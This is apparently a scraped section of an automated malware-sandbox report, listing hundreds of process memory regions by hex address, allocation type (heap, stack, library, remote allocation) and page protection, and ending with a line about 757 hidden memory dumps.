trusted library allocation
|
page read and write
|
||
|
61CA000
|
heap
|
page read and write
|
||
|
2D30000
|
trusted library allocation
|
page read and write
|
||
|
6C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
72C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
5740000
|
trusted library allocation
|
page read and write
|
||
|
5410000
|
heap
|
page read and write
|
||
|
5B50000
|
trusted library allocation
|
page read and write
|
||
|
10F7000
|
stack
|
page read and write
|
||
|
2F7C000
|
trusted library allocation
|
page read and write
|
||
|
339E000
|
stack
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
3117000
|
trusted library allocation
|
page execute and read and write
|
||
|
330F000
|
trusted library allocation
|
page read and write
|
||
|
5DBE000
|
stack
|
page read and write
|
||
|
31A9000
|
trusted library allocation
|
page read and write
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
43B000
|
remote allocation
|
page execute and read and write
|
||
|
5806000
|
trusted library allocation
|
page read and write
|
||
|
444000
|
remote allocation
|
page execute and read and write
|
||
|
62DE000
|
stack
|
page read and write
|
||
|
32DB000
|
trusted library allocation
|
page read and write
|
||
|
43FD000
|
trusted library allocation
|
page read and write
|
||
|
344A000
|
trusted library allocation
|
page read and write
|
||
|
4482000
|
trusted library allocation
|
page read and write
|
||
|
110A000
|
stack
|
page read and write
|
||
|
669E000
|
stack
|
page read and write
|
||
|
59C0000
|
trusted library allocation
|
page read and write
|
||
|
2F84000
|
trusted library allocation
|
page read and write
|
||
|
41D000
|
remote allocation
|
page execute and read and write
|
||
|
6D70000
|
trusted library allocation
|
page read and write
|
||
|
335C000
|
trusted library allocation
|
page read and write
|
||
|
2D42000
|
trusted library allocation
|
page read and write
|
||
|
334B000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
heap
|
page execute and read and write
|
||
|
7F300000
|
trusted library allocation
|
page execute and read and write
|
||
|
30D9000
|
trusted library allocation
|
page read and write
|
||
|
2B9F000
|
unkown
|
page read and write
|
||
|
BEAE000
|
stack
|
page read and write
|
||
|
324D000
|
trusted library allocation
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page read and write
|
||
|
5860000
|
heap
|
page read and write
|
||
|
6226000
|
heap
|
page read and write
|
||
|
573B000
|
stack
|
page read and write
|
||
|
42B8000
|
trusted library allocation
|
page read and write
|
||
|
D3A000
|
stack
|
page read and write
|
||
|
11B5000
|
heap
|
page read and write
|
||
|
649E000
|
stack
|
page read and write
|
||
|
617E000
|
stack
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
2D80000
|
trusted library allocation
|
page read and write
|
||
|
1115000
|
heap
|
page read and write
|
||
|
441B000
|
trusted library allocation
|
page read and write
|
||
|
68DD000
|
stack
|
page read and write
|
||
|
14E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
423000
|
remote allocation
|
page execute and read and write
|
||
|
56D0000
|
trusted library allocation
|
page read and write
|
||
|
16D0000
|
trusted library allocation
|
page read and write
|
||
|
5B3E000
|
stack
|
page read and write
|
||
|
7754000
|
trusted library allocation
|
page read and write
|
||
|
2FEA000
|
trusted library allocation
|
page read and write
|
||
|
5400000
|
trusted library allocation
|
page read and write
|
||
|
402000
|
remote allocation
|
page execute and read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
344E000
|
trusted library allocation
|
page read and write
|
||
|
6C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FCC000
|
stack
|
page read and write
|
||
|
2FDE000
|
trusted library allocation
|
page read and write
|
||
|
6AB4000
|
heap
|
page read and write
|
||
|
4148000
|
trusted library allocation
|
page read and write
|
||
|
7DCF000
|
stack
|
page read and write
|
||
|
58E4000
|
heap
|
page read and write
|
||
|
16E0000
|
trusted library allocation
|
page read and write
|
||
|
2D9E000
|
unkown
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
3552000
|
trusted library allocation
|
page read and write
|
||
|
6D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
30E5000
|
trusted library allocation
|
page read and write
|
||
|
80FD000
|
stack
|
page read and write
|
||
|
6F1E000
|
stack
|
page read and write
|
||
|
6D1E000
|
stack
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
354E000
|
trusted library allocation
|
page read and write
|
||
|
311B000
|
trusted library allocation
|
page execute and read and write
|
||
|
5810000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D97000
|
stack
|
page read and write
|
||
|
506C000
|
stack
|
page read and write
|
||
|
30FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
3456000
|
trusted library allocation
|
page read and write
|
||
|
5560000
|
heap
|
page execute and read and write
|
||
|
77AE000
|
stack
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
3419000
|
trusted library allocation
|
page read and write
|
||
|
40EE000
|
trusted library allocation
|
page read and write
|
||
|
3626000
|
trusted library allocation
|
page read and write
|
||
|
1500000
|
heap
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
421000
|
remote allocation
|
page execute and read and write
|
||
|
12AB000
|
heap
|
page read and write
|
||
|
2E74000
|
trusted library allocation
|
page read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
5B1E000
|
stack
|
page read and write
|
||
|
786D000
|
stack
|
page read and write
|
||
|
6AF4000
|
heap
|
page read and write
|
||
|
6DA0000
|
trusted library allocation
|
page read and write
|
||
|
5B00000
|
trusted library section
|
page readonly
|
||
|
4185000
|
trusted library allocation
|
page read and write
|
||
|
3361000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7764000
|
heap
|
page read and write
|
||
|
5F80000
|
heap
|
page read and write
|
||
|
7352000
|
trusted library allocation
|
page read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
5AF0000
|
trusted library section
|
page read and write
|
||
|
5990000
|
trusted library allocation
|
page read and write
|
||
|
2FDD000
|
trusted library allocation
|
page read and write
|
||
|
BFCE000
|
stack
|
page read and write
|
||
|
4735000
|
trusted library allocation
|
page read and write
|
||
|
331B000
|
trusted library allocation
|
page read and write
|
||
|
143B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
651E000
|
stack
|
page read and write
|
||
|
6ADF000
|
stack
|
page read and write
|
||
|
B44E000
|
stack
|
page read and write
|
||
|
5450000
|
heap
|
page read and write
|
||
|
5B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FFD000
|
trusted library allocation
|
page read and write
|
||
|
3653000
|
trusted library allocation
|
page read and write
|
||
|
15F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
3145000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
trusted library section
|
page read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
1304000
|
heap
|
page read and write
|
||
|
3214000
|
trusted library allocation
|
page read and write
|
||
|
31A4000
|
trusted library allocation
|
page read and write
|
||
|
6B25000
|
heap
|
page read and write
|
||
|
CEA000
|
stack
|
page read and write
|
||
|
5490000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
3592000
|
trusted library allocation
|
page read and write
|
||
|
BFEE000
|
stack
|
page read and write
|
||
|
5800000
|
trusted library allocation
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
685E000
|
stack
|
page read and write
|
||
|
11BE000
|
heap
|
page read and write
|
||
|
2EBE000
|
stack
|
page read and write
|
||
|
BB0B000
|
stack
|
page read and write
|
||
|
B88E000
|
stack
|
page read and write
|
||
|
4874000
|
trusted library allocation
|
page read and write
|
||
|
2AAA000
|
stack
|
page read and write
|
||
|
6A9E000
|
stack
|
page read and write
|
||
|
655E000
|
stack
|
page read and write
|
||
|
140F000
|
stack
|
page read and write
|
||
|
1502000
|
trusted library allocation
|
page read and write
|
||
|
45F6000
|
trusted library allocation
|
page read and write
|
||
|
122B000
|
heap
|
page read and write
|
||
|
2D47000
|
trusted library allocation
|
page execute and read and write
|
||
|
3613000
|
trusted library allocation
|
page read and write
|
||
|
5B70000
|
heap
|
page execute and read and write
|
||
|
2FCC000
|
trusted library allocation
|
page read and write
|
||
|
3309000
|
trusted library allocation
|
page read and write
|
||
|
32D8000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
641E000
|
stack
|
page read and write
|
||
|
43E5000
|
trusted library allocation
|
page read and write
|
||
|
33EF000
|
trusted library allocation
|
page read and write
|
||
|
6290000
|
heap
|
page read and write
|
||
|
7750000
|
heap
|
page read and write
|
||
|
3245000
|
trusted library allocation
|
page read and write
|
||
|
1237000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
C2CD000
|
stack
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
2D13000
|
trusted library allocation
|
page execute and read and write
|
||
|
3ED1000
|
trusted library allocation
|
page read and write
|
||
|
1195000
|
heap
|
page read and write
|
||
|
2D2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3415000
|
trusted library allocation
|
page read and write
|
||
|
1155000
|
heap
|
page read and write
|
||
|
456F000
|
trusted library allocation
|
page read and write
|
||
|
3587000
|
trusted library allocation
|
page read and write
|
||
|
53CE000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
2E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
473C000
|
trusted library allocation
|
page read and write
|
||
|
6AA0000
|
heap
|
page read and write
|
||
|
4424000
|
trusted library allocation
|
page read and write
|
||
|
2ED1000
|
trusted library allocation
|
page read and write
|
||
|
682C000
|
heap
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
57F0000
|
trusted library allocation
|
page read and write
|
||
|
77DA000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page execute and read and write
|
||
|
61C7000
|
heap
|
page read and write
|
||
|
2E4E000
|
stack
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
577B000
|
stack
|
page read and write
|
||
|
5A9E000
|
stack
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
47C1000
|
trusted library allocation
|
page read and write
|
||
|
6D77000
|
trusted library allocation
|
page read and write
|
||
|
14F7000
|
stack
|
page read and write
|
||
|
6D00000
|
trusted library allocation
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
14FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
53F5000
|
trusted library allocation
|
page read and write
|
||
|
121B000
|
heap
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
57E0000
|
heap
|
page read and write
|
||
|
659E000
|
stack
|
page read and write
|
||
|
6D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
C9A000
|
stack
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
3485000
|
trusted library allocation
|
page read and write
|
||
|
5B46000
|
trusted library allocation
|
page read and write
|
||
|
3252000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
trusted library allocation
|
page read and write
|
||
|
11D7000
|
heap
|
page read and write
|
||
|
43C000
|
remote allocation
|
page execute and read and write
|
||
|
2E70000
|
trusted library allocation
|
page read and write
|
||
|
4316000
|
trusted library allocation
|
page read and write
|
||
|
1255000
|
heap
|
page read and write
|
||
|
2C3A000
|
stack
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page read and write
|
||
|
1639000
|
heap
|
page read and write
|
||
|
4407000
|
trusted library allocation
|
page read and write
|
||
|
117E000
|
heap
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
14D0000
|
trusted library allocation
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
585A000
|
trusted library allocation
|
page read and write
|
||
|
432C000
|
trusted library allocation
|
page read and write
|
||
|
30BC000
|
trusted library allocation
|
page read and write
|
||
|
1506000
|
trusted library allocation
|
page execute and read and write
|
||
|
11CA000
|
heap
|
page read and write
|
||
|
2F25000
|
trusted library allocation
|
page read and write
|
||
|
C18B000
|
stack
|
page read and write
|
||
|
6C40000
|
trusted library allocation
|
page read and write
|
||
|
323F000
|
trusted library allocation
|
page read and write
|
||
|
4428000
|
trusted library allocation
|
page read and write
|
||
|
1500000
|
trusted library allocation
|
page read and write
|
||
|
1600000
|
heap
|
page read and write
|
||
|
4584000
|
trusted library allocation
|
page read and write
|
||
|
3649000
|
trusted library allocation
|
page read and write
|
||
|
11DE000
|
stack
|
page read and write
|
||
|
2D20000
|
trusted library allocation
|
page read and write
|
||
|
6C1F000
|
stack
|
page read and write
|
||
|
BAAF000
|
stack
|
page read and write
|
||
|
5804000
|
trusted library allocation
|
page read and write
|
||
|
30FF000
|
trusted library allocation
|
page read and write
|
||
|
61D4000
|
heap
|
page read and write
|
||
|
2FE0000
|
trusted library allocation
|
page read and write
|
||
|
61F4000
|
heap
|
page read and write
|
||
|
481E000
|
trusted library allocation
|
page read and write
|
||
|
B8AF000
|
stack
|
page read and write
|
||
|
1282000
|
heap
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
3585000
|
trusted library allocation
|
page read and write
|
||
|
5910000
|
trusted library allocation
|
page read and write
|
||
|
4286000
|
trusted library allocation
|
page read and write
|
||
|
40E9000
|
trusted library allocation
|
page read and write
|
||
|
442D000
|
trusted library allocation
|
page read and write
|
||
|
4723000
|
trusted library allocation
|
page read and write
|
||
|
449D000
|
trusted library allocation
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
149E000
|
stack
|
page read and write
|
||
|
B84E000
|
stack
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page execute and read and write
|
||
|
4751000
|
trusted library allocation
|
page read and write
|
||
|
43C1000
|
trusted library allocation
|
page read and write
|
||
|
321C000
|
trusted library allocation
|
page read and write
|
||
|
59A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1267000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
7B8E000
|
stack
|
page read and write
|
||
|
475F000
|
trusted library allocation
|
page read and write
|
||
|
40DC000
|
trusted library allocation
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
3112000
|
trusted library allocation
|
page read and write
|
||
|
478B000
|
trusted library allocation
|
page read and write
|
||
|
BD4F000
|
stack
|
page read and write
|
||
|
57E4000
|
heap
|
page read and write
|
||
|
310F000
|
trusted library allocation
|
page read and write
|
||
|
43D0000
|
trusted library allocation
|
page read and write
|
||
|
2FEE000
|
trusted library allocation
|
page read and write
|
||
|
1530000
|
heap
|
page read and write
|
||
|
136F000
|
stack
|
page read and write
|
||
|
585E000
|
trusted library allocation
|
page read and write
|
||
|
58F0000
|
heap
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
30F0000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
1244000
|
heap
|
page read and write
|
||
|
2F2A000
|
trusted library allocation
|
page read and write
|
||
|
4100000
|
trusted library allocation
|
page read and write
|
||
|
345E000
|
trusted library allocation
|
page read and write
|
||
|
3406000
|
trusted library allocation
|
page read and write
|
||
|
335F000
|
trusted library allocation
|
page read and write
|
||
|
5B2A000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
6196000
|
heap
|
page read and write
|
||
|
45C5000
|
trusted library allocation
|
page read and write
|
||
|
115E000
|
stack
|
page read and write
|
||
|
4061000
|
trusted library allocation
|
page read and write
|
||
|
44FC000
|
trusted library allocation
|
page read and write
|
||
|
BA2000
|
unkown
|
page readonly
|
||
|
15F4000
|
trusted library allocation
|
page read and write
|
||
|
53DD000
|
trusted library allocation
|
page read and write
|
||
|
14E4000
|
trusted library allocation
|
page read and write
|
||
|
2D96000
|
trusted library allocation
|
page read and write
|
||
|
80BD000
|
stack
|
page read and write
|
||
|
1432000
|
trusted library allocation
|
page read and write
|
||
|
5790000
|
heap
|
page read and write
|
||
|
754F000
|
stack
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
55E0000
|
heap
|
page read and write
|
||
|
36AB000
|
trusted library allocation
|
page read and write
|
||
|
4420000
|
trusted library allocation
|
page read and write
|
||
|
14F0000
|
trusted library allocation
|
page read and write
|
||
|
63DE000
|
stack
|
page read and write
|
||
|
53D1000
|
trusted library allocation
|
page read and write
|
||
|
66DE000
|
stack
|
page read and write
|
||
|
53B4000
|
trusted library allocation
|
page read and write
|
||
|
121E000
|
heap
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
3556000
|
trusted library allocation
|
page read and write
|
||
|
5B90000
|
heap
|
page read and write
|
||
|
43D000
|
remote allocation
|
page execute and read and write
|
||
|
2DB8000
|
trusted library allocation
|
page read and write
|
||
|
5B26000
|
trusted library allocation
|
page read and write
|
||
|
6150000
|
heap
|
page read and write
|
||
|
5B44000
|
trusted library allocation
|
page read and write
|
||
|
58C0000
|
trusted library section
|
page readonly
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
368A000
|
trusted library allocation
|
page read and write
|
||
|
C3CE000
|
stack
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E60000
|
trusted library allocation
|
page read and write
|
||
|
46FD000
|
trusted library allocation
|
page read and write
|
||
|
3212000
|
trusted library allocation
|
page read and write
|
||
|
BE8E000
|
stack
|
page read and write
|
||
|
5861000
|
trusted library allocation
|
page read and write
|
||
|
440E000
|
trusted library allocation
|
page read and write
|
||
|
14DC000
|
stack
|
page read and write
|
||
|
4415000
|
trusted library allocation
|
page read and write
|
||
|
691E000
|
stack
|
page read and write
|
||
|
1203000
|
trusted library allocation
|
page execute and read and write
|
||
|
3367000
|
trusted library allocation
|
page read and write
|
||
|
422000
|
remote allocation
|
page execute and read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
358D000
|
trusted library allocation
|
page read and write
|
||
|
466B000
|
trusted library allocation
|
page read and write
|
||
|
5780000
|
trusted library allocation
|
page read and write
|
||
|
679E000
|
stack
|
page read and write
|
||
|
4487000
|
trusted library allocation
|
page read and write
|
||
|
4386000
|
trusted library allocation
|
page read and write
|
||
|
4083000
|
trusted library allocation
|
page read and write
|
||
|
4512000
|
trusted library allocation
|
page read and write
|
||
|
311B000
|
trusted library allocation
|
page read and write
|
||
|
2D94000
|
trusted library allocation
|
page read and write
|
||
|
43F000
|
remote allocation
|
page execute and read and write
|
||
|
6C2D000
|
trusted library allocation
|
page read and write
|
||
|
5F8F000
|
heap
|
page read and write
|
||
|
355C000
|
trusted library allocation
|
page read and write
|
||
|
BBAD000
|
stack
|
page read and write
|
||
|
4091000
|
trusted library allocation
|
page read and write
|
||
|
3017000
|
trusted library allocation
|
page read and write
|
||
|
433000
|
remote allocation
|
page execute and read and write
|
||
|
361D000
|
trusted library allocation
|
page read and write
|
||
|
34A3000
|
trusted library allocation
|
page read and write
|
||
|
58ED000
|
stack
|
page read and write
|
||
|
584B000
|
trusted library allocation
|
page read and write
|
||
|
4258000
|
trusted library allocation
|
page read and write
|
||
|
1437000
|
trusted library allocation
|
page execute and read and write
|
||
|
3ED9000
|
trusted library allocation
|
page read and write
|
||
|
4099000
|
trusted library allocation
|
page read and write
|
||
|
369A000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
4741000
|
trusted library allocation
|
page read and write
|
||
|
6C20000
|
trusted library allocation
|
page read and write
|
||
|
16E5000
|
trusted library allocation
|
page read and write
|
||
|
67E6000
|
heap
|
page read and write
|
||
|
467A000
|
trusted library allocation
|
page read and write
|
||
|
5B5D000
|
trusted library allocation
|
page read and write
|
||
|
2FDB000
|
trusted library allocation
|
page read and write
|
||
|
2BAA000
|
heap
|
page read and write
|
||
|
595E000
|
stack
|
page read and write
|
||
|
30D1000
|
trusted library allocation
|
page read and write
|
||
|
699E000
|
stack
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page execute and read and write
|
||
|
310B000
|
trusted library allocation
|
page read and write
|
||
|
3106000
|
trusted library allocation
|
page execute and read and write
|
||
|
3247000
|
trusted library allocation
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
3409000
|
trusted library allocation
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
41D3000
|
trusted library allocation
|
page read and write
|
||
|
11B7000
|
heap
|
page read and write
|
||
|
78EE000
|
stack
|
page read and write
|
||
|
31A7000
|
trusted library allocation
|
page read and write
|
||
|
311F000
|
trusted library allocation
|
page read and write
|
||
|
2D3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
31B8000
|
trusted library allocation
|
page read and write
|
||
|
6180000
|
heap
|
page read and write
|
||
|
553D000
|
stack
|
page read and write
|
||
|
2FD0000
|
trusted library allocation
|
page read and write
|
||
|
67A0000
|
heap
|
page read and write
|
||
|
5833000
|
heap
|
page read and write
|
||
|
1180000
|
trusted library allocation
|
page read and write
|
||
|
150A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FF1000
|
trusted library allocation
|
page read and write
|
||
|
1252000
|
heap
|
page read and write
|
||
|
32E6000
|
trusted library allocation
|
page read and write
|
||
|
142A000
|
trusted library allocation
|
page execute and read and write
|
||
|
46B2000
|
trusted library allocation
|
page read and write
|
||
|
518C000
|
stack
|
page read and write
|
||
|
15F0000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
5830000
|
heap
|
page read and write
|
||
|
2F0B000
|
heap
|
page read and write
|
||
|
7BCE000
|
stack
|
page read and write
|
||
|
160F000
|
stack
|
page read and write
|
||
|
58AE000
|
stack
|
page read and write
|
||
|
3554000
|
trusted library allocation
|
page read and write
|
||
|
41C000
|
remote allocation
|
page execute and read and write
|
||
|
37E1000
|
trusted library allocation
|
page read and write
|
||
|
BDAF000
|
stack
|
page read and write
|
||
|
BC0C000
|
stack
|
page read and write
|
||
|
3622000
|
trusted library allocation
|
page read and write
|
||
|
3697000
|
trusted library allocation
|
page read and write
|
||
|
4709000
|
trusted library allocation
|
page read and write
|
||
|
117A000
|
heap
|
page read and write
|
||
|
B64D000
|
stack
|
page read and write
|
||
|
59C0000
|
heap
|
page read and write
|
||
|
3442000
|
trusted library allocation
|
page read and write
|
||
|
6E9F000
|
stack
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
443000
|
remote allocation
|
page execute and read and write
|
There are 757 hidden memdumps, click here to show them.